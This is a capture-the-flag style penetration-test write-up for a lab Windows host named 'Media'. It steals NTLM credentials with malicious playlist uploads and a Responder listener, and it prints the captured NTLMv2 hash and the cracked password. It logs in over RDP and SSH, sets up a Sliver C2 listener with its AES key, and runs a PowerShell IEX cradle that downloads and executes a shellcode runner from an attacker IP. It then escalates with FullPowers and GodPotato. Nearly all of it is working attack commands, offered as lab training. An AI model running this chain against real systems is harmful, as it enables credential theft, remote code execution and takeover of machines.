Detailed Findings and Recommendations
The scope of this penetration test is to identify, exploit and report the results of of penetration test performed on following set of IP address.
| Machine ID | IPs | Domain | DC |
|---|---|---|---|
| Media | 10.10.126.191 | media.vl | dc.sendai.vl |
Enumeration: Phase-1
Port Scanning
sudo nmap -sC -sV -oA delegate 10.10.126.191-sC: Runs default Nmap scripts.-sV: Detects service versions.-oA: Outputs in all formats (normal, XML, and grepable) and saves with the prefixdelegate.
nmap_results media.nmapThe above command is a tool to convert nmap file into Markdown table format.
| Port | Service | Version |
|---|---|---|
| 22 | ssh | OpenSSH for_Windows_8.1 |
| 80 | http | Apache httpd 2.4.56 http-title: ProMotion Studio |
| 3389 | ms-wbt-server | Microsoft Terminal Services - Target_Name: MEDIA - Product_Version: 10.0.20348 - NetBIOS_Computer_Name: MEDIA - rdp-ntlm-info: - DNS_Domain_Name: MEDIA - NetBIOS_Domain_Name: MEDIA - Not valid before: 2024-05-22T17:05:26 - DNS_Computer_Name: MEDIA - ssl-cert: Subject: commonName=MEDIA |
HTTP - Port 80 Enumeration
- Visiting the site.
- The site tells us that we need to upload a video which is compatible to Windows Media Player.
- The user in hiring team is probably going to watch that video.
Directory Enumeration
feroxbuster -k -u http://10.10.126.191 --force-recursion -C 404,405 -m GET,POST -e -x html,js,php,asp
Resource Development
NTLM Theft by uploading video file.
python3 ntlm_theft.py -g m3u,wax,asx -s 10.8.2.41 -f media
mv media* ../../vulnlab/media
Try uploading m3u, asx, wax files.
sudo responder -I tun0
I started by uploading asx file first and after few seconds I go the ntlmv2 hash.
vim enox_hash
enox::MEDIA:3060d0ca3bea20bb:5B10AE49938768B664C1B6B96C0803F1:010100000000000000DACE9519ADDA019AD531AFB74B8D6900000000020008004300350041005A0001001E00570049004E002D005400580045004D00510050004100520052003900570004003400570049004E002D005400580045004D0051005000410052005200390057002E004300350041005A002E004C004F00430041004C00030014004300350041005A002E004C004F00430041004C00050014004300350041005A002E004C004F00430041004C000700080000DACE9519ADDA0106000400020000000800300030000000000000000000000000300000424A43341B223890B60CC8DB218973E5076CED7C340B293A6EFBC1906DC6ED800A0010000000000000000000000000000000000009001C0063006900660073002F00310030002E0038002E0032002E00340031000000000000000000
hashcat enox_hash /usr/share/wordlists/rockyou.txt
| Username | Password |
|---|---|
| enox | 1234virus@ |
Check if we have access to rdp service
cme rdp 10.10.126.191 -u 'enox' -p '1234virus@'
Check if we have access to ssh service
cme ssh 10.10.126.191 -u 'enox' -p '1234virus@'
Initial Access
We try to access both the open ports using the credential of enox user.
xfreerdp /u:enox /p:'1234virus@' /v:10.10.126.191
ssh enox@10.10.126.191
https -L 10.8.2.41 -l 443stage-listener --url https://10.8.2.41:8446 --profile vulnhub64 -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShVExecuting Sliver powershell shellcode runner
(New-Object System.Net.WebClient).DownloadString('http://10.8.2.41/amsi64.txt') | IEX
VL{28ec1c0c64abcc790954f27429fbf5ff}
Privilege Escalation
Method 1 - NTFS Mount Points/ Directory Junctions
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.2.41:80/amsi64.txt')"
Increasing the privileges
Local System but not SE Impersonate or disabled.
./FullPowers.exe -c "powershell -ep bypass"
SE Impersonate ( Method 3 Godpotato donut)
VL{dc7871a771551174176b0cc7af8ad3bd}